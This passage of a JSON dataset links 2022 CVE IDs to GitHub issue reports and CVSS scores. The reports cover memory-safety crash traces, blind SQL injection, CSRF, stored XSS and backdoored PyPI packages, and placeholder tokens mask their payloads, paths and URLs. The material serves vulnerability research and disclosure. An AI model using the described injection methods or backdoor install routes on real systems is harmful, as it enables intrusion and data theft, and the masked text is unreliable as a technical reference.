        "description": "heap buffer overflow exists in the function dwg_add_object in decode.c. system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e NUMBERTAG ac NUMBERTAG at pc NUMBERTAG bc NUMBERTAG bp NUMBERTAG fffffffc7c0 sp NUMBERTAG fffffffbf NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG e NUMBERTAG ac NUMBERTAG thread T NUMBERTAG bc NUMBERTAG in __asan_memset PATHTAG NUMBERTAG a NUMBERTAG e in dwg_add_object PATHTAG NUMBERTAG e NUMBERTAG in dwg_add_VIEW PATHTAG NUMBERTAG c NUMBERTAG e in APITAG PATHTAG NUMBERTAG d7a in APITAG PATHTAG NUMBERTAG a in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG e NUMBERTAG ac NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d NUMBERTAG in realloc PATHTAG NUMBERTAG b9ca in APITAG PATHTAG NUMBERTAG d7a in APITAG PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in __asan_memset Shadow bytes around the buggy address NUMBERTAG c5c7fff NUMBERTAG c5c7fff NUMBERTAG c5c7fff NUMBERTAG c5c7fff NUMBERTAG c5c7fff NUMBERTAG c5c7fff NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5c7fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5c7fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5c7fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5c7fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5c7fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-33032",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/488",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/488",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2022-06-07T01:34:49Z",
        "description": "heap buffer overflow exists in the function APITAG in decode_r NUMBERTAG c. system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG dc bp NUMBERTAG fffffffca NUMBERTAG sp NUMBERTAG fffffffc9f8 WRITE of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG db in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG a in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d NUMBERTAG in calloc PATHTAG NUMBERTAG f0 in APITAG PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa]fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-33033",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/493",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/493",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2022-06-08T01:47:21Z",
        "description": "double free exists in the function dwg_read_file in dwg.c . system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG attempting double free on NUMBERTAG a NUMBERTAG in thread T NUMBERTAG d NUMBERTAG a0 in APITAG PATHTAG NUMBERTAG d NUMBERTAG a in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG a NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d NUMBERTAG in calloc PATHTAG NUMBERTAG cdd0 in dat_read_file PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG double free PATHTAG in APITAG NUMBERTAG ABORTING poc URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-33034",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/494",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/494",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2022-06-08T01:51:23Z",
        "description": "stack buffer overflow exists in the function copy_bytes in decode_r NUMBERTAG c. system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fffffffc8f0 at pc NUMBERTAG bb bp NUMBERTAG fffffffbc NUMBERTAG sp NUMBERTAG fffffffbc NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG fffffffc8f0 thread T NUMBERTAG ba in copy_bytes PATHTAG NUMBERTAG ba in decompress_r NUMBERTAG PATHTAG NUMBERTAG in read_file_header PATHTAG NUMBERTAG in read_r NUMBERTAG meta_data PATHTAG NUMBERTAG in decode_R NUMBERTAG PATHTAG NUMBERTAG in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG ) Address NUMBERTAG fffffffc8f0 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG f in read_r NUMBERTAG meta_data PATHTAG This frame has NUMBERTAG object(s NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG str.i NUMBERTAG sec_dat.i NUMBERTAG str_dat.i NUMBERTAG ptr.i NUMBERTAG data.i NUMBERTAG file_header' APITAG NUMBERTAG fff NUMBERTAG f3]f NUMBERTAG fff NUMBERTAG f3 f3 f3 f3 f3 f3 f3 f NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-33067",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/224",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/224",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2022-05-04T08:48:54Z",
        "description": "APITAG invalid shifts. Describe the bug APITAG two runtime errors that expose invalid integer shifts in the library. To Reproduce Built lrzip using clang NUMBERTAG with CXXFLAGS and/or CFLAGS ERRORTAG commit: APITAG UBSAN Output ERRORTAG testcases: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-33068",
        "Issue_Url_old": "https://github.com/harfbuzz/harfbuzz/issues/3557",
        "Issue_Url_new": "https://github.com/harfbuzz/harfbuzz/issues/3557",
        "Repo_new": "harfbuzz/harfbuzz",
        "Issue_Created_At": "2022-04-29T15:03:57Z",
        "description": "APITAG signed integer overflow. Describe the bug APITAG signed integer overflow in hb ot shape fallback.cc To Reproduce Built harfbuzz shape fuzzer using clang NUMBERTAG according to FILETAG with ERRORTAG commit: APITAG UBSAN Output ERRORTAG testcase: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-33069",
        "Issue_Url_old": "https://github.com/ethereum/solidity/issues/12973",
        "Issue_Url_new": "https://github.com/ethereum/solidity/issues/12973",
        "Repo_new": "ethereum/solidity",
        "Issue_Created_At": "2022-04-29T16:12:49Z",
        "description": "ERRORTAG Solidity assertion failed in in APITAG Describe the bug The attached testcase crashes the solidity compiler solc with an ERRORTAG Solidity assertion failed in in APITAG URLTAG To Reproduce Built solc_ossfuzz using clang NUMBERTAG according to FILETAG with ERRORTAG commit: APITAG Crash Output ERRORTAG zipped testcase to reproduce: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-33082",
        "Issue_Url_old": "https://github.com/open-policy-agent/opa/issues/4762",
        "Issue_Url_new": "https://github.com/open-policy-agent/opa/issues/4762",
        "Repo_new": "open-policy-agent/opa",
        "Issue_Created_At": "2022-06-09T13:10:19Z",
        "description": "Shadowing of called functions in comprehension heads can cause compiler panic. If a local var in a comprehension body overrides a function call in the comprehension head, it will never be possible to make that call. ERRORTAG Will cause an eval time error: ERRORTAG A compile time error should be introduced for capturing this case. A special case exists that will cause a compiler panic: ERRORTAG APITAG => ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-33082",
        "Issue_Url_old": "https://github.com/open-policy-agent/opa/issues/4761",
        "Issue_Url_new": "https://github.com/open-policy-agent/opa/issues/4761",
        "Repo_new": "open-policy-agent/opa",
        "Issue_Created_At": "2022-06-09T12:47:04Z",
        "description": "opa eval panics when using APITAG . ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-33092",
        "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/6",
        "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/6",
        "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
        "Issue_Created_At": "2022-06-09T09:41:10Z",
        "description": "SQL Injection vulnerability. Exploit Title: SQL Injection vulnerability on APITAG Date of Discovery: PATHTAG Product APITAG Download link\uff1a FILETAG Vulnerability Description: APITAG has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data. POC: Payload\uff1a PATHTAG APITAG In the path PATHTAG is not strictly filtered for $keyword, resulting in SQL injection exp1: URLTAG FILETAG As you can see from the figure above, the APITAG function is executed, and there is a time blind SQL With the payload test above, it is possible that the APITAG function being executed NUMBERTAG times. Time blinds are possible to guess the length of the database: exp2: URLTAG FILETAG As shown in the following figure, we can know through the arbitrary file read vulnerability that The database name of the website is qscms2 , and the delay as exactly NUMBERTAG times the length of APITAG so the injection is successfull FILETAG It's a time based SQL injection Suggest: Add a filter function to this parameter",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-33094",
        "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/4",
        "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/4",
        "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
        "Issue_Created_At": "2022-06-09T07:48:06Z",
        "description": "SQL Injection vulnerability . Exploit Title: SQL Injection vulnerability on APITAG Date of Discovery: PATHTAG Product APITAG Download link\uff1a FILETAG Vulnerability Description: APITAG has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data. POC: Payload\uff1a PATHTAG APITAG APITAG In the path PATHTAG is not strictly filtered for $keyword, resulting in SQL injection exp1: URLTAG FILETAG As you can see from the figure above, the APITAG function is executed, and there is a time blind SQL With the payload test above it is possible to delay the function being executed twice out of NUMBERTAG Time blinds are possible to guess the length of the database: exp2: URLTAG FILETAG As shown in the following figure, we can know through the arbitrary file read vulnerability that The database name of the website is qscms2 , and the delay as exactly double the length of APITAG so the injection is successfull FILETAG It's a time based SQL injection Suggest: Add a filter function to this parameter",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-33097",
        "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/7",
        "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/7",
        "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
        "Issue_Created_At": "2022-06-09T09:41:16Z",
        "description": "SQL Injection vulnerability. Exploit Title: SQL Injection vulnerability on APITAG Date of Discovery: PATHTAG Product APITAG Download link\uff1a FILETAG Vulnerability Description: APITAG has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data. POC: Payload\uff1a PATHTAG APITAG / In the path PATHTAG is not strictly filtered for $keyword, resulting in SQL injection exp1: URLTAG FILETAG As you can see from the figure above, the APITAG function is executed, and there is a time blind SQL With the payload test above, it is possible that the APITAG function being executed NUMBERTAG times. Time blinds are possible to guess the length of the database: exp2: URLTAG FILETAG As shown in the following figure, we can know through the arbitrary file read vulnerability that The database name of the website is telojob_se , and the delay as exactly NUMBERTAG times the length of APITAG so the injection is successfull FILETAG It's a time based SQL injection Suggest: Add a filter function to this parameter",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-33114",
        "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/38",
        "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/38",
        "Repo_new": "jflyfox/jfinal_cms",
        "Issue_Created_At": "2022-06-10T02:49:09Z",
        "description": "SQL injection vulnerability exists in APITAG CMS NUMBERTAG The vulnerability appears in lines NUMBERTAG of the APITAG APITAG APITAG The APITAG parameter is the APITAG parameter passed from the front end So you can construct payload to exploit this vulnerability Exploit Maven Startup Environment Vulnerability address: PATHTAG Administrator login is required. The default account password is admin:admin NUMBERTAG APITAG Injection parameters: APITAG payload\uff1a CODETAG APITAG Sqlmap: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-33121",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/45",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/45",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2022-06-11T12:37:22Z",
        "description": "There are two CSRF vulnerabilities that can lead to deleting local .dat files. Software Link : URLTAG After the installation is complete, log in as administrator, open the page In FILETAG and FILETAG , user can delete any local .dat files without filter FILETAG FILETAG Create NUMBERTAG dat in the parent directory FILETAG To delete NUMBERTAG dat, the url is like URLTAG Or URLTAG Also you can delete any .dat file like local google chrome file FILETAG URLTAG Here is CSRF POC FILETAG : Log in and click the link in APITAG modify the parameter of delete and users will delete the .dat file in the specified directory at last. APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-33122",
        "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/24",
        "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/24",
        "Repo_new": "weng-xianhu/eyoucms",
        "Issue_Created_At": "2022-06-12T02:49:11Z",
        "description": "There is stored XSS in version NUMBERTAG which can lead to stealing sensitive information of logged in users. Software Link : URLTAG Website : FILETAG Vulnerable version NUMBERTAG download address \uff1a FILETAG After the installation is complete, log in as admin, open the page FILETAG Here you can fill in malicious APITAG code to cause stored xss FILETAG Malicious code is spliced \u200b\u200binto the href link FILETAG Causes stored XSS to steal sensitive information of logged in users FILETAG POC : APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2022-33124",
        "Issue_Url_old": "https://github.com/aio-libs/aiohttp/issues/6772",
        "Issue_Url_new": "https://github.com/aio-libs/aiohttp/issues/6772",
        "Repo_new": "aio-libs/aiohttp",
        "Issue_Created_At": "2022-05-31T11:50:45Z",
        "description": "nvalid IP NUMBERTAG URL. Describe the bug URL analysis To Reproduce use oss fuzz this is the crash APITAG APITAG Expected behavior Denial of service Logs/tracebacks ERRORTAG Python Version APITAG aiohttp Version APITAG multidict Version APITAG yarl Version APITAG OS ubuntu Related component Server Additional context _No response_ Code of Conduct [X] I agree to follow the aio libs Code of Conduct",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-34000",
        "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/1477",
        "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/1477",
        "Repo_new": "libjxl/libjxl",
        "Issue_Created_At": "2022-06-06T08:27:22Z",
        "description": "Assert failure in APITAG desc There is a assert failure in libjxl before version NUMBERTAG that could cause deny of service attack. asan output ERRORTAG poc FILETAG reproduce compile libjxl with address sanitizer run APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-34053",
        "Issue_Url_old": "https://github.com/ylliprifti/dr-web-engine/issues/4",
        "Issue_Url_new": "https://github.com/ylliprifti/dr-web-engine/issues/4",
        "Repo_new": "ylliprifti/dr-web-engine",
        "Issue_Created_At": "2022-06-13T14:09:38Z",
        "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG APITAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install dr web APITAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG APITAG in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-34054",
        "Issue_Url_old": "https://github.com/ludovicmoncla/perdido/issues/1",
        "Issue_Url_new": "https://github.com/ludovicmoncla/perdido/issues/1",
        "Repo_new": "ludovicmoncla/perdido",
        "Issue_Created_At": "2022-06-14T03:20:00Z",
        "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install perdido NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-34055",
        "Issue_Url_old": "https://github.com/drewxa/summer-tasks/issues/4",
        "Issue_Url_new": "https://github.com/drewxa/summer-tasks/issues/4",
        "Repo_new": "drewxa/summer-tasks",
        "Issue_Created_At": "2022-06-14T03:45:36Z",
        "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install drxhello NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG Your project url: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-34056",
        "Issue_Url_old": "https://github.com/TimHessels/watertools/issues/1",
        "Issue_Url_new": "https://github.com/timhessels/watertools/issues/1",
        "Repo_new": "timhessels/watertools",
        "Issue_Created_At": "2022-06-14T10:23:53Z",
        "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install watertools NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-34059",
        "Issue_Url_old": "https://github.com/sixfab/setup-and-diagnostic-tool/issues/7",
        "Issue_Url_new": "https://github.com/sixfab/setup-and-diagnostic-tool/issues/7",
        "Repo_new": "sixfab/setup-and-diagnostic-tool",
        "Issue_Created_At": "2022-06-14T14:03:52Z",
        "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install sixfab tool i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG replace request with requests",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-34060",
        "Issue_Url_old": "https://github.com/togglee/togglee-python/issues/2",
        "Issue_Url_new": "https://github.com/togglee/togglee-python/issues/2",
        "Repo_new": "togglee/togglee-python",
        "Issue_Created_At": "2022-06-14T14:24:03Z",
        "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install togglee NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-34061",
        "Issue_Url_old": "https://github.com/CatNeverCodes/catly_translate/issues/1",
        "Issue_Url_new": "https://github.com/tunglies/catly_translate/issues/1",
        "Repo_new": "tunglies/catly_translate",
        "Issue_Created_At": "2022-06-15T03:16:03Z",
        "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install catly translate NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-34065",
        "Issue_Url_old": "https://github.com/rondolu/project-yt-concate/issues/1",
        "Issue_Url_new": "https://github.com/rondolu/project-yt-concate/issues/1",
        "Repo_new": "rondolu/project-yt-concate",
        "Issue_Created_At": "2022-06-16T14:49:33Z",
